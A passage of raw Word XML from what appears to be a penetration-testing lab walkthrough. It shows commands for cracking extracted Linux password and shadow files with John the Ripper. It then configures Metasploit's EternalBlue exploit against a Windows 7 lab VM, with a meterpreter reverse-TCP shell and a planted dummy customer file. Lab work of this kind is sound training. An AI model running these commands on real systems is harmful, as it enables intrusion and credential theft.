                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5013D721" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2430EABA" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 16 — Crack the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A9B4F8" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali (new terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209047F1" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>John the Ripper recovering the plaintext passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A24A4B8" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>unshadow passwd.txt shadow.txt &gt; crack.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACFFB36" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt crack.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E534B0" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>john --show crack.txt</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="20401838" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F231743" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC84065" wp14:editId="095B497F">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="201" name="Fig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6"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55EDDCA2" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213606D9" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:before="240" w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 5 — Exploit C: Windows 7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + Exfiltration (VM .103)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B17E10" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 17 — Plant the “sensitive” file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243DED60" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Windows 7 (Command Prompt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C8533D" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The dummy customer record on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E436B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\CustomerData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD4E3D" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>1001,Test</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> User,4111-1111-1111-1111 &gt; C:\CustomerData\customers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F696D" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>type C:\CustomerData\customers.txt</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="498BCD9A" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="024C70B0" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E1F48B5" wp14:editId="61350ABD">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202" name="Fig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7"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="135B7999" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3754953C" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 18 — Load </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDF08B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31E4DB" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The configured exploit options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E256FAA" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3998E3" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AB04EB" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE89E02" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3302AF7C" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>set LHOST 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912EC29" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="69BEAACF" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35FA98A4" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE9DD56" wp14:editId="08DCFC92">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="203" name="Fig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8"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52ABC23B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
